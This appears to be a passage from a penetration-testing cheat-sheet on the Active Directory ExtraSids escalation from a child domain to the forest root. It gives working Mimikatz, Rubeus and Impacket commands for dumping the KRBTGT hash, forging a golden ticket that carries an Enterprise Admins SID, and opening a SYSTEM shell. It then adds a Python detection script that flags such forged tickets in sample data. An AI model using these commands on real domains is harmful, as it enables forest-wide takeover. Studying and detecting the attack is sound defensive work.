To perform this attack after compromising a child domain, we need the following:

- The KRBTGT hash for the child domain
- The SID for the child domain
- The name of a target user in the child domain (does not need to exist!)
- The FQDN of the child domain
- The SID of the Enterprise Admins group of the root domain

With this data collected, the attack can be performed with Mimikatz.
```
# Obtaining the KRBTGT Account's NT Hash using Mimikatz, which also gives the SID
PS C:\> mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt

# Alternative to get the SID using PowerView
Get-DomainSID

# Obtaining the Enterprise Admins Group's SID using Get-DomainGroup from PowerView
Get-DomainGroup -Domain DOMAIN.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

# Or using the cmdlet
Get-ADGroup -Identity "Enterprise Admins" -Server "DOMAIN.LOCAL"

# Creating a Golden Ticket with Mimikatz
mimikatz # kerberos::golden /user:hacker /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

# Checking if the Golden Ticket for the non-existent user hacker is residing in memory
klist
```
ExtraSids Attack - Rubeus
```
# Creating a Golden Ticket using Rubeus
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
```
Linux
```
# Performing DCSync with secretsdump.py
secretsdump.py child.domain.local/adm@ip -just-dc-user child/krbtgt

# Performing SID brute forcing using lookupsid.py
# (to construct their SID: DOMAIN_SID-RID)
lookupsid.py child.domain.local/adm@ip

# Looking for the Domain SID
lookupsid.py child.domain.local/adm@ip | grep -B12 "Enterprise Admins"

# Constructing a Golden Ticket using ticketer.py
ticketer.py -nthash 9d7---5f -domain CHILD.DOMAIN.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

# Setting the KRB5CCNAME environment variable
export KRB5CCNAME=hacker.ccache

# Getting a SYSTEM shell using Impacket's psexec.py
psexec.py CHILD.DOMAIN.LOCAL/hacker@dc01.domain.local -k -no-pass -target-ip ip

# OR

# Automating all of the above: performing the attack with raiseChild.py
raiseChild.py -target-exec ip CHILD.DOMAIN.LOCAL/adm
```
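The two data points that make this attack work, a privileged SID from the root domain carried in the ticket's ExtraSids (SID history) and a user name that need not exist in the child domain, are also the two things a defender can look for. The following is an added example for that detection side; it is not code from the original page or from Mimikatz, Rubeus or Impacket. The `TicketRecord` shape is an assumed abstraction of what a PAC-inspecting sensor or log parser would expose, the ticket records and the `KNOWN_CHILD_USERS` set are constructed sample data, and the SIDs reuse the values shown on this page.

```python
"""
Defender-side triage for ExtraSids abuse: flag tickets whose SID history carries
a privileged SID from a domain other than the issuing one, or whose user is not
present in the issuing domain. Added example; all records below are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

# Well-known RIDs of groups that grant domain- or forest-wide admin rights.
PRIVILEGED_RIDS: Dict[int, str] = {
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

# Domain SID (S-1-5-21-a-b-c) followed by exactly one RID component.
_SID_WITH_RID = re.compile(r"^S-1-5-21(-\d+){4}$")


@dataclass
class TicketRecord:
    """Assumed shape of what a PAC-inspecting sensor exposes per ticket."""
    user: str
    domain: str                # realm the ticket claims to be issued by
    domain_sid: str            # SID of that realm
    extra_sids: List[str] = field(default_factory=list)   # ExtraSids / SID history


def split_sid(sid: str) -> Tuple[str, int]:
    """Split 'S-1-5-21-a-b-c-RID' into ('S-1-5-21-a-b-c', RID); reject anything else."""
    if not _SID_WITH_RID.match(sid):
        raise ValueError(f"not a domain SID with RID: {sid!r}")
    head, _, rid = sid.rpartition("-")
    return head, int(rid)


def find_cross_domain_privileged_sids(rec: TicketRecord) -> List[Tuple[str, str]]:
    """Return (sid, group name) for every privileged SID in ExtraSids whose
    domain part differs from the ticket's own domain SID."""
    hits = []
    for sid in rec.extra_sids:
        domain_part, rid = split_sid(sid)
        if rid in PRIVILEGED_RIDS and domain_part != rec.domain_sid:
            hits.append((sid, PRIVILEGED_RIDS[rid]))
    return hits


def triage(tickets: List[TicketRecord], known_users: Set[str]) -> List[Tuple[str, List[str]]]:
    """Return (user, reasons) for each ticket that trips at least one check."""
    known = {u.lower() for u in known_users}
    flagged = []
    for rec in tickets:
        reasons = []
        for sid, group in find_cross_domain_privileged_sids(rec):
            reasons.append(f"extra SID {sid} ({group}) belongs to a domain other than {rec.domain}")
        if rec.user.lower() not in known:
            reasons.append(f"user {rec.user!r} does not exist in {rec.domain}")
        if reasons:
            flagged.append((rec.user, reasons))
    return flagged


# Constructed sample data. The SIDs are the ones shown on this page.
CHILD_SID = "S-1-5-21-2806153819-209893948-922872689"
ROOT_SID = "S-1-5-21-3842939050-3880317879-2865463114"
KNOWN_CHILD_USERS = {"adm", "alice"}          # constructed directory listing
SAMPLE_TICKETS = [
    # forged ticket: non-existent user plus root-domain Enterprise Admins SID
    TicketRecord("hacker", "CHILD.DOMAIN.LOCAL", CHILD_SID, [ROOT_SID + "-519"]),
    # legitimate: child Domain Admin, SID history stays inside the child domain
    TicketRecord("adm", "CHILD.DOMAIN.LOCAL", CHILD_SID, [CHILD_SID + "-512"]),
    # legitimate: ordinary user with no SID history
    TicketRecord("alice", "CHILD.DOMAIN.LOCAL", CHILD_SID, []),
]

if __name__ == "__main__":
    for user, reasons in triage(SAMPLE_TICKETS, KNOWN_CHILD_USERS):
        print(user)
        for r in reasons:
            print("  -", r)
```

The domain-part comparison is the key check: a SID history entry from the child's own domain (the `adm` record) is normal, while a RID-519 SID whose domain part is the root domain's SID only ever reaches the child's KDC through a forged PAC, since the child's KDC does not issue Enterprise Admins membership itself.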